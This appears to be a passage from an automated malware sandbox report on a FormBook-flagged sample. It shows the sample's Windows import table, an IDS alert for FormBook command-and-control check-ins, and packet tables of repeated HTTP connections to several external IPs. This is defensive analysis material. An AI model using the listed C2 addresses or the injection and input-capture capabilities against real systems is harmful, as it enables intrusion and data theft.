                                                            KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                            USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                            GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                            COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                            ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                            OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                            DescriptionData
                                                            Translation0x0809 0x04b0
                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishGreat Britain

                                                            Download Network PCAP: filteredfull

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2025-04-01T09:04:00.390735+02002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.44972413.248.213.4580TCP
                                                            • Total Packets: 152
                                                            • 80 (HTTP)
                                                            • 53 (DNS)
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Apr 1, 2025 09:03:18.231762886 CEST4972380192.168.2.4144.76.229.203
                                                            Apr 1, 2025 09:03:18.413503885 CEST8049723144.76.229.203192.168.2.4
                                                            Apr 1, 2025 09:03:18.413647890 CEST4972380192.168.2.4144.76.229.203
                                                            Apr 1, 2025 09:03:18.423346996 CEST4972380192.168.2.4144.76.229.203
                                                            Apr 1, 2025 09:03:18.599528074 CEST8049723144.76.229.203192.168.2.4
                                                            Apr 1, 2025 09:03:18.600884914 CEST8049723144.76.229.203192.168.2.4
                                                            Apr 1, 2025 09:03:18.600924969 CEST8049723144.76.229.203192.168.2.4
                                                            Apr 1, 2025 09:03:18.601089001 CEST4972380192.168.2.4144.76.229.203
                                                            Apr 1, 2025 09:03:18.605992079 CEST4972380192.168.2.4144.76.229.203
                                                            Apr 1, 2025 09:03:18.792289972 CEST8049723144.76.229.203192.168.2.4
                                                            Apr 1, 2025 09:03:59.168407917 CEST4972480192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:00.182728052 CEST4972480192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:00.277307034 CEST804972413.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:00.278023958 CEST4972480192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:00.293005943 CEST4972480192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:00.383843899 CEST804972413.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:00.390646935 CEST804972413.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:00.390670061 CEST804972413.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:00.390734911 CEST4972480192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:00.394443035 CEST804972413.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:00.394512892 CEST4972480192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:01.807756901 CEST4972480192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:02.827152014 CEST4972580192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:02.923476934 CEST804972513.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:02.924273968 CEST4972580192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:02.938894033 CEST4972580192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:03.026273012 CEST804972513.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:03.030935049 CEST804972513.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:03.030960083 CEST804972513.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:03.031053066 CEST4972580192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:03.040121078 CEST804972513.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:03.040189028 CEST4972580192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:04.448566914 CEST4972580192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:05.467688084 CEST4972680192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:05.563896894 CEST804972613.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:05.564058065 CEST4972680192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:05.578892946 CEST4972680192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:05.673835993 CEST804972613.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:05.673855066 CEST804972613.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:05.673917055 CEST804972613.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:05.673930883 CEST804972613.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:05.673943996 CEST804972613.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:05.673957109 CEST804972613.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:05.673970938 CEST804972613.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:05.678824902 CEST804972613.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:05.678839922 CEST804972613.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:05.678927898 CEST4972680192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:05.683953047 CEST804972613.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:05.684003115 CEST4972680192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:07.089164972 CEST4972680192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:08.108042955 CEST4972780192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:08.208446980 CEST804972713.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:08.208563089 CEST4972780192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:08.217838049 CEST4972780192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:08.316675901 CEST804972713.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:08.340334892 CEST804972713.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:08.340364933 CEST804972713.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:08.340573072 CEST4972780192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:08.343290091 CEST4972780192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:08.347959042 CEST804972713.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:08.348023891 CEST4972780192.168.2.413.248.213.45
                                                            Apr 1, 2025 09:04:08.443607092 CEST804972713.248.213.45192.168.2.4
                                                            Apr 1, 2025 09:04:13.488854885 CEST4972880192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:13.582381010 CEST8049728104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:13.582496881 CEST4972880192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:13.597109079 CEST4972880192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:13.690326929 CEST8049728104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:13.975892067 CEST8049728104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:13.975910902 CEST8049728104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:13.975963116 CEST4972880192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:13.976109028 CEST8049728104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:13.976207018 CEST4972880192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:15.104644060 CEST4972880192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:16.124277115 CEST4972980192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:16.222264051 CEST8049729104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:16.224154949 CEST4972980192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:16.238420963 CEST4972980192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:16.349490881 CEST8049729104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:16.604953051 CEST8049729104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:16.605211973 CEST8049729104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:16.605264902 CEST4972980192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:16.605612040 CEST8049729104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:16.605676889 CEST4972980192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:17.745548964 CEST4972980192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:18.765486956 CEST4973080192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:18.863607883 CEST8049730104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:18.863692045 CEST4973080192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:18.881954908 CEST4973080192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:18.979811907 CEST8049730104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:18.979849100 CEST8049730104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:19.255834103 CEST8049730104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:19.255867004 CEST8049730104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:19.255975008 CEST4973080192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:19.256028891 CEST8049730104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:19.256100893 CEST4973080192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:20.386324883 CEST4973080192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:21.450494051 CEST4973180192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:21.547656059 CEST8049731104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:21.547782898 CEST4973180192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:21.556158066 CEST4973180192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:21.651160955 CEST8049731104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:21.919503927 CEST8049731104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:21.919523001 CEST8049731104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:21.919533014 CEST8049731104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:21.919622898 CEST8049731104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:21.919678926 CEST4973180192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:21.919785976 CEST4973180192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:21.924940109 CEST4973180192.168.2.4104.21.32.1
                                                            Apr 1, 2025 09:04:22.014940977 CEST8049731104.21.32.1192.168.2.4
                                                            Apr 1, 2025 09:04:53.512461901 CEST4973280192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:04:53.799537897 CEST804973247.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:04:53.806291103 CEST4973280192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:04:53.818047047 CEST4973280192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:04:54.121046066 CEST804973247.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:04:54.638560057 CEST804973247.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:04:54.638592005 CEST804973247.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:04:54.638637066 CEST4973280192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:04:55.323522091 CEST4973280192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:04:56.342364073 CEST4973380192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:04:56.629614115 CEST804973347.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:04:56.632196903 CEST4973380192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:04:56.647674084 CEST4973380192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:04:56.948592901 CEST804973347.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:04:57.658437014 CEST804973347.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:04:57.658476114 CEST804973347.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:04:57.658587933 CEST4973380192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:04:58.161710978 CEST4973380192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:04:59.171161890 CEST4973480192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:04:59.460505009 CEST804973447.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:04:59.460602045 CEST4973480192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:04:59.477433920 CEST4973480192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:04:59.768932104 CEST804973447.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:04:59.768991947 CEST804973447.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:04:59.769022942 CEST804973447.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:04:59.769052982 CEST804973447.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:00.518054962 CEST804973447.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:00.518084049 CEST804973447.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:00.518170118 CEST4973480192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:00.979866028 CEST4973480192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:01.998641014 CEST4973580192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:02.311549902 CEST804973547.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:02.314177036 CEST4973580192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:02.323060036 CEST4973580192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:02.617233038 CEST804973547.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:03.321115971 CEST804973547.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:03.321149111 CEST804973547.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:03.321269989 CEST4973580192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:03.355029106 CEST4973580192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:03.653471947 CEST804973547.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:16.819154978 CEST4973680192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:17.108165026 CEST804973647.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:17.108251095 CEST4973680192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:17.125931978 CEST4973680192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:17.408420086 CEST804973647.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:18.088798046 CEST804973647.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:18.088856936 CEST804973647.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:18.089483023 CEST4973680192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:18.636075974 CEST4973680192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:19.660274982 CEST4973780192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:19.944371939 CEST804973747.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:19.944483042 CEST4973780192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:19.959129095 CEST4973780192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:20.251585007 CEST804973747.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:20.805785894 CEST804973747.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:20.805807114 CEST804973747.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:20.805880070 CEST4973780192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:21.464229107 CEST4973780192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:22.483179092 CEST4973880192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:22.771785975 CEST804973847.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:22.771876097 CEST4973880192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:22.833292961 CEST4973880192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:23.128701925 CEST804973847.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:23.128724098 CEST804973847.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:23.797908068 CEST804973847.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:23.797920942 CEST804973847.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:23.799551010 CEST4973880192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:24.342112064 CEST4973880192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:25.358537912 CEST4973980192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:25.650537968 CEST804973947.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:25.650655985 CEST4973980192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:25.659905910 CEST4973980192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:25.942357063 CEST804973947.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:26.658189058 CEST804973947.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:26.658211946 CEST804973947.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:26.658375978 CEST4973980192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:26.662312984 CEST4973980192.168.2.447.83.1.90
                                                            Apr 1, 2025 09:05:26.961345911 CEST804973947.83.1.90192.168.2.4
                                                            Apr 1, 2025 09:05:31.926489115 CEST4974080192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:32.096522093 CEST8049740162.218.30.235192.168.2.4
                                                            Apr 1, 2025 09:05:32.100218058 CEST4974080192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:32.116102934 CEST4974080192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:32.283509970 CEST8049740162.218.30.235192.168.2.4
                                                            Apr 1, 2025 09:05:32.284173012 CEST4974080192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:33.620426893 CEST4974080192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:34.639805079 CEST4974180192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:34.803587914 CEST8049741162.218.30.235192.168.2.4
                                                            Apr 1, 2025 09:05:34.803698063 CEST4974180192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:34.821824074 CEST4974180192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:34.999754906 CEST8049741162.218.30.235192.168.2.4
                                                            Apr 1, 2025 09:05:34.999847889 CEST4974180192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:36.323579073 CEST4974180192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:37.343415976 CEST4974280192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:37.508555889 CEST8049742162.218.30.235192.168.2.4
                                                            Apr 1, 2025 09:05:37.508634090 CEST4974280192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:37.527936935 CEST4974280192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:37.692194939 CEST8049742162.218.30.235192.168.2.4
                                                            Apr 1, 2025 09:05:37.692320108 CEST8049742162.218.30.235192.168.2.4
                                                            Apr 1, 2025 09:05:37.692370892 CEST4974280192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:39.044867039 CEST4974280192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:40.061067104 CEST4974380192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:40.240211010 CEST8049743162.218.30.235192.168.2.4
                                                            Apr 1, 2025 09:05:40.240428925 CEST4974380192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:40.252130985 CEST4974380192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:40.421483994 CEST8049743162.218.30.235192.168.2.4
                                                            Apr 1, 2025 09:05:40.424222946 CEST4974380192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:40.427191019 CEST4974380192.168.2.4162.218.30.235
                                                            Apr 1, 2025 09:05:40.590544939 CEST8049743162.218.30.235192.168.2.4
                                                            Apr 1, 2025 09:05:45.627563000 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:05:46.755150080 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:05:48.807928085 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:05:52.892647028 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:06:00.901710033 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:06:07.983736038 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:06:09.078090906 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:06:11.095854044 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:06:15.198625088 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:06:23.198633909 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:06:30.233912945 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:06:31.266379118 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:06:33.275823116 CEST4974480192.168.2.4194.9.94.85
                                                            Apr 1, 2025 09:06:37.293139935 CEST4974480192.168.2.4194.9.94.85
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Apr 1, 2025 09:03:11.410608053 CEST5353086162.159.36.2192.168.2.4
                                                            Apr 1, 2025 09:03:17.952788115 CEST5311753192.168.2.41.1.1.1
